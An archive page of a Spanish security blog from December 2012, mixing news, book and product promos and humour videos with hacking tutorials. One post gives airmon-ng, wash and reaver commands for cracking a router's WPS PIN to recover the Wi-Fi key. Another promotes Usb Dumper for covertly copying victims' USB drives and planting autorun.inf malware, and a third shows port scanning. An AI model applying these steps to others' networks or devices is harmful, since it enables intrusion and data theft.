Ads 468x60px

Image and video hosting by TinyPic

viernes, 21 de diciembre de 2012

Volvemos después de Navidad

Hola a tod@s

Os tengo que decir un hasta luego, en este caso hasta el día 2 de Enero del 2013 si Dios y/o los mayas quieren. El año que viene seguiremos con mas historias que contar por aquí.


En mi ausencia, quedarán ellos a cargo de la web reportándome cualquier incidencia.





Feliz Navidad a todos y nos vemos el año que viene!!!


No seáis malos. 

jueves, 20 de diciembre de 2012

Vulnerabilidad WIFI mediante WPS

Hola a tod@s!

WPS o Wi-Fi Protected Setup como dice la Wikipedia WPS es un estándar promovido por la Wi-Fi Alliance para la creación de redes WLAN seguras. En otras palabras, WPS no es un mecanismo de seguridad por sí, se trata de la definición de diversos mecanismos para facilitar la configuración de una red WLAN segura con WPA2, pensados para minimizar la intervención del usuario en entornos domésticos o pequeñas oficinas (SOHO). Concretamente, WPS define los mecanismos a través de los cuales los diferentes dispositivos de la red obtienen las credenciales (SSID y PSK) necesarias para iniciar el proceso de autenticación. 

Vamos a lío. Lo primero nos descargamos Reaver.

Una vez situados en la carpeta donde descargamos Reaver lo descomprimiremos:

airmon-ng start wlan0         


wash -i mon0

reaver -i mon0 -b 00:00:00:00:00:00 -vv   (En este paso os dará el PIN, atentos)

reaver -i mon0 -b 00:00:00:00:00:00 -p PIN -vv  (Y listo os dará en texto plano la clave)


Este método de sacar la clave resulta un poco pesado, pues puede durar entre uno y tres horas dependiendo de la calidad de la señal.

Os dejo con este vídeo que me sirvió mucho para realizar estas pruebas. Y señores desactiven WPS de sus routers.




No seáis malos. 

miércoles, 19 de diciembre de 2012

Servidor u Ordenador

Mejorar la seguridad de sus datos con una actualización de servidor

En su fase de crecimiento, la mayoría de pequeñas empresas atraviesan momentos difíciles derivados del mismo crecimiento, al tener que transformar su mosaico de ordenadores de sobremesa, routers y servidores de impresión en una robusta infraestructura informática que pueda ampliarse a medida que la empresa se expanda. Si hasta ahora su empresa ha estado funcionando con una red de ordenadores de sobremesa como depósito de recursos de datos compartidos, pronto descubrirá que al crecer ha excedido la capacidad de ese sistema y un servidor de nivel básico puede ofrecerle la funcionalidad que necesita. Además, a medida que crezcan las necesidades de su empresa, las cuestiones relacionadas con la fiabilidad y la seguridad de los datos pasarán a ocupar un primer plano. Manejar datos de los clientes plantea problemas serios de responsabilidad, y un ordenador de sobremesa dedicado no le ayudará a resolverlos.


Cómo mejoran los servidores la redundancia y la seguridad de los datos

¿Qué pasaría si el disco duro del ordenador de sobremesa en el que almacena todos los datos compartidos de la empresa fallase de repente? Dejando a un lado las cuestiones de responsabilidad por los datos de clientes, considere cuántas horas de trabajo se perderían si desapareciesen esos datos. Es evidente que una tecnología defectuosa puede ser el talón de Aquiles de las pequeñas empresas que todavía no se hayan lanzado a un sistema redundante y tolerante a fallos.

Tenga en consideración esta infografía en la que se comparan las diferencias entre ordenadores de sobremesa y servidores, especialmente el apartado sobre redundancia. Aunque los ordenadores de sobremesa pueden tener más de un disco duro, por lo general no incorporan configuraciones RAID que dupliquen dichos discos para conseguir una copia de seguridad en tiempo real por si uno de los discos falla. Los servidores están diseñados en torno a ese tipo de consideraciones y están configurados, además, para tolerar la pérdida de uno o más discos duros sin perder los datos que estén almacenados en ellos.

En la infografía puede verse que la fiabilidad de la alimentación también ha de tenerse en cuenta, especialmente si nuestros clientes y empleados confían en que las aplicaciones alojadas e incluso nuestro sitio web (si nos encargamos de su alojamiento) estén disponibles las 24 horas del día, los 7 días de la semana. Los servidores están diseñados teniendo en mente las redundancias de las fuentes de alimentación; en cambio, ese no es el caso de la mayoría de ordenadores de sobremesa.

Además de la fiabilidad del hardware, la seguridad de los datos ante amenazas externas es una preocupación que va en aumento a medida que su organización crece. Los cortafuegos y otras medidas de seguridad para empresas requieren tener un servidor. Además, si dirige el acceso a internet a través del servidor, podrá incluso controlar cierto tráfico malicioso que pueda estar intentando acceder a su red.

A medida que vayan aumentando sus requerimientos tecnológicos, también lo hará la cantidad de posibles problemas derivados de su dependencia de dicha tecnología. Gestionarlos de forma inteligente y con visión de futuro es la única manera de anticiparse a esas preocupaciones en lugar de desear haberlo hecho tras haber sufrido una violación de datos importante o una avería de hardware.

Brian Jensen trabaja para Dell. Le apasiona leer y escribir sobre tecnología y, en su tiempo libre, le gusta viajar, cocinar y dedicarle tiempo a su familia. Si desea más información sobre servidores de Dell, haga clic aquí.


Artículo Cortesía: María Corcuera



No seáis malos. 

NIÑA REPELENTE CAPITULO 13-14

Hola a tod@s

En el capítulo de hoy las aventuras de Margarita en el colegio.




Y en el siguiente capítulo el padre de Margarita utilizando la psicología inversa.



No seáis malos. 

martes, 18 de diciembre de 2012

Estadísticas 2012

Hola a tod@s

Hoy me gustaría compartir con todos ustedes los entresijos de Estación Informática y enseñaros las estadísticas de este año 2012 que ya finaliza.


Esta claro que al ser una web española, las visitas mas frecuentas son de España, seguido de tres países de habla hispana como México, Colombia y Argentina. El idioma naturalmente también influye.



Chrome es el navegador es mas utilizado para visitarnos e Internet Explorer y Mozilla Firefox se encuentran ahí muy igualados en la disputa.



En el sistema operativo esta claro el liderazgo de Windows, me preocupa que los seguidores de este blog no utilice los dispositivos móviles para ver los artículos, ya que lo tengo habilitado para poder visualizar de forma optima los artículos en los Smartphones. Hay blogs que tienen la visualización web y es muy desagradable ver su contenido en un teléfono móvil. Animaros para también ver el blog con dispositivos móviles.





En la imagen anterior podemos ver las url desde donde nos visitan mas. Destacando HackPlayers. Desde aquí muchas gracias a todos por compartir nuestra web.




No seáis malos. 


lunes, 17 de diciembre de 2012

Votad lo mejor del 2012

Hola a tod@s!

Ya se termina el año y es momento de recuentos, estadísticas, ver que tal fue el año que ya termina.
Por ello desde Estación Informática queremos que participéis con vuestra opinión. Hemos tirado de estadísticas de Blogger para traeros las entradas mas visitadas por vosotros y votar a la mejor entrada del año.

¿COMO VOTAR?

Podréis votar en la encuesta creada a la derecha del blog. A continuación os enumero los post mas visitados durante este año. Pos si dudáis en la votación, os recuerdo cuales son:

Liberad a WIFI

Año mas Viejo, Crecen los Libros

Armitage

Anubis

Software Marketing

Hackean al PP

Auditar-wifi-wpa.html

Los documentos saben mucho

Gran reflexion de Chema

USB Forense

Los numeros y el phishing


La fecha limite para votar será hasta el día 31 de Diciembre y no irme sin daros las gracias porque si vosotros esta web no tendría sentido.

GRACIAS!!!


No seáis malos. 

viernes, 14 de diciembre de 2012

FluBlocker


Hola a tod@s

Volvemos con nuestra sección de artículos ¿Y tú de quien eres?, hoy traemos una aplicación de nuestros amigos de Flu, su nombre FluBlocker. Esta herramienta se describe como un módulo instalable en IIS 7 o superior, para Windows Server, que permite bloquear conexiones al servidor a través de una serie de filtros parametrizables, permitiendo entre otros, bloquear conexiones que provengan de una IP determinada, que provengan de un puerto origen específico, que contengan un user-agent o una parte del mismo, un método determinado, etc. 



Imagen 1: Administrador IIS


Imagen 2: Fichero de configuración



Puedes descargar el código fuente, el módulo compilado y el manual de usuario y administración, gratuitamente, desde el siguiente enlace: http://code.google.com/p/flu-blocker/downloads/list



No seáis malos. 

jueves, 13 de diciembre de 2012

Vulnerabilidad Samsung Smart TV


Hola a tod@s

Os acordáis de aquellos relojes en los que se podía cambiar los canales de la televisión. En los que te invitaba tu vecino a merendar en su casa y entre colacao y bocata os divertíais cambiándole de canal la TV y fastidiándole la novela a la madre de tu amigo. Pues a partir de hoy lo podréis hacer en casa de vuestra suegra. Eso sí, si vuestra suegra tiene un televisor Samsung.  

Gracias a ReVuln Ltd que ha descubierto una vulnerabilidad de día cero en el Samsung Smart TV que permite a los malos obtener información importante, acceso al monitor y a la raíz del dispositivo de forma remota.

Aún no se sabe con certeza qué modelos fueron afectados por esta vulnerabilidad.
Así que si tenéis un televisor Samsung Smart TV cuidado, te pueden fastidiar la tarde de fútbol.

Han demostrado como se realiza el ataque en el siguiente vídeo:




ReVuln - The TV is watching you from ReVuln on Vimeo.





No seáis malos. 



miércoles, 12 de diciembre de 2012

Niña Repelente Capítulo 11-12

Hola a tod@s

Un poco de humor con la niña mas gamberra de Internet.









No seáis malos. 

martes, 11 de diciembre de 2012

Hacker Épico

Hola a tod@s

Uno mas en la familia y van muchos, 18 libros ya editados por Informática 64. Este nuevo ejemplar se titula Hacker Épico es un libro mezcla de novela negra y manual técnico, este libro aspira a entretener e informar a partes iguales sobre un mundo tan apasionante como es el de la seguridad informática. Técnicas de hacking web, sistemas y análisis forense, son algunos de los temas que se tratan con total rigor y excelentemente documentados. 
Sus autores Alejandro Ramos y Rodrigo Yepes




Sinopsis

Ángel Ríos, auditor de una empresa puntera en el sector de la seguridad informática, se encuentra en el mejor momento, tanto en el terreno profesional como en el personal. A las puertas del fin de semana, está a punto de terminar un importante proyecto y se prepara para acudir a una cita con Yolanda, antigua compañera de clase de la que siempre ha estado enamorado. Sin embargo, el encuentro no sale como esperaba: ella no está interesada en iniciar una relación; sólo quiere que le ayude a descifrar un misterioso archivo. Ángel empieza a sospechar que algo raro está pasando, pero el corazón le mueve a aceptar el encargo sin hacer preguntas.

Lo que no imagina es que el compromiso que ha adquirido con la chica va mucho más lejos que un simple trabajo. De pronto, se ve envuelto en una intriga relacionada con el contenido del archivo que complicará su vida y lo expondrá a un grave peligro. En el camino hacia la verdad, únicamente contará con sus sorprendentes conocimientos de hacking y el apoyo de su peculiar amigo Marcos.

Podéis realizar su pedido por sólo 20€ aquí.



No seáis malos. 

viernes, 7 de diciembre de 2012

Usb Dumper


Hola a tod@s

Usb Dumper una aplicación indispensable si queréis dedicaros a copiar datos de a través de Usb. Principalmente la función de Usb Dumper es realizar un backup de todos los datos de una memoria de forma automática y totalmente transparente al usuario. 

Esta aplicación está disponible para Windows y es de código libre. Se trata de una aplicación muy simple pero a la vez muy peligrosa, ya que copia todo los archivos del pendrive insertado sin que la víctima se de cuanta. También incluye una opción aún más peligrosa como es que instale un autorun.inf en el pen y cuando este sea conectado a cualquier PC ejecute un script, imaginad un troyano, keyloggers, etc.

Vamos a ver cómo funciona en imágenes.

Inicio Usb Dumper


No tiene mucho, no es nada complicado lo único que tenéis que hacer para que empiece a rular es pulsar el botón Start. Los datos te los copiara por defecto en la carpeta usbdumper\bin.

Introducción Pendrive


La víctima introduce el pendrive, posiblemente para copiar los apuntes del martes o la foto tan chula del fin de semana pasado. El programa de mientras esta funcionando y copiando todo en segundo plano, copiando claro todo, lo confidencial también. Ya esta, listo la aplicación lo guardo todo y renombro con fecha actual.


Carpeta con la copia



Con la opción filter, puedes filtrar por extensión de archivos, es decir si sólo os interesa copiar .jpg o .png.
Con las opciones macros, copiar macros de Word y Excel.
Y por último y mas peligroso el crear un autorun.inf para ejecutar script en maquinas ajenas para su infección. Imaginad, la víctima introduce el pendrive en su PC y de forma automática se copia el autorun.inf, al llegar a casa la víctima introduce su pen en su ordenador sin darse cuenta de nada, de forma transparente lo que había en autorun.inf ya se copio por todos los directorios del PC, tal vez un gusano, virus, troyano, spyware o keyloggers, quien sabe..., quizás la víctima inocente nunca se de cuanta de nada.

La aplicación la podéis descargar aquí.


No seáis malos. 

jueves, 6 de diciembre de 2012

Internet no Respeta ni a su Padre


Hola a tod@s

He querido rescatar esta noticia que ya salió a la luz en los medios.

Tim Berners-Lee el mismísimo creador de la www (la World Wide Web), él y su grupo crearon el lenguaje HTML, el protocolo HTTP, lo que quiero demostrar es hasta qué punto la red de redes es más peligrosa de lo que creemos, pudo comprobarlo por el mismo.

Tim realizo una transacción económica por Internet, unas compras navideñas, ya os avise lo que pasa sobre todo en Navidad, por su puesto la compra nunca la recibió. Tim fue víctima de una estafa en la red. 

Está claro que la red que invento Tim ha cambiado mucho, ni más ni menos que 20 años pero, no creéis que es muy Heavy que su invento se vuelva contra él.                                                   Según Tim “el futuro de la red depende de la seguridad, la seguridad todo un desafío”.

Tim fue víctima de Phishing, suplantaron posiblemente la web oficial. O quizás los estafadores no se molestaron ni en copiar una web sino que crearon una inexistente. Siempre hay que verificar que la web existe.


No seáis malos. 

miércoles, 5 de diciembre de 2012

Niña Repelente Capítulo 9-10

Hola a tod@s

En esta entrega, Margarita os enseñara el calor que pasamos los sevillanos en la ciudad Hispalense.






Y en el décimo capítulo como una niña te puede comprometer en el supermercado.


martes, 4 de diciembre de 2012

Escaneo de Puertos con SuperScan

Hola a tod@s

Uno de los primeros pasos que se debe aplicar en una auditoría de seguridad informática es el proceso de Footprinting, más concretamente lo que vamos hacer hoy es auditar una web.
Lo que haremos será escanear los puertos, con ello sabremos que puertos tiene abiertos, que tenga un puerto abierto no significa que se haya encontrado un fallo de seguridad pero, si nos puede dar ideas a futuros ataques.

Sea va a utilizar un escáner de puertos llamado SuperScan, esta es la primera pantalla que encontramos al abrir la aplicación.

Pantalla Inicio

En la pestaña Port list setup se configura algunas opciones, como los puertos  a escanear, puerto 21 (FTP), o los puertos que interesen.



Configuración de Puertos


Una vez que ya hemos configurado los puertos que nos interese y introducimos la IP en la primera textbox y en IP- Start y Stop. Si probáis con el botón Lookup os resolverá el nombre del servidor. Con la opción Me, escaneará la IP 127.0.0.1, es decir vosotros.




Ahora si, con la configuración anterior pulsamos Start, comenzará con el escaneo de puertos en la web.



Inicio Escaneo




Tras concluir el escaneo nos lista los protocolos que se encuentran abiertos, el 21, 25, 80, y 110.


                                   Conexiones 


Tras ver que puertos están abiertos, podemos conectarnos con un cliente Telnet como Putty. Tendréis acceso? Puede que si, a probar suerte. 
Lo mas importante ya hemos recopilado algo de información en nuestro proceso de Footprinting.


No seáis malos. 

lunes, 3 de diciembre de 2012

Me podéis seguir en Windows Técnico

Hola a tod@s!


Como dice el título, me podéis seguir en Windows Técnico. No sólo me podéis ver por aquí, también en Windows Técnico, un blog de Informática64 de Chema Alonso, en el que analizaremos a fondo los productos Microsoft, con eventos, administración, seguridad, configuración, desarrollo y mucho mas. Un blog con más de tres años de existencia, informando diariamente de los productos Microsoft.

Logotipo de Windows


Sin duda un blog de referencia, un blog de esos que marcas en favoritos y esperas cada día su nueva publicación, para estar informado de primera mano sobre los productos Microsoft.


No seáis malos. 
Related Posts Plugin for WordPress, Blogger...
 

X1RED+SEGURA

Spy Block

COLABORA

 
cookie script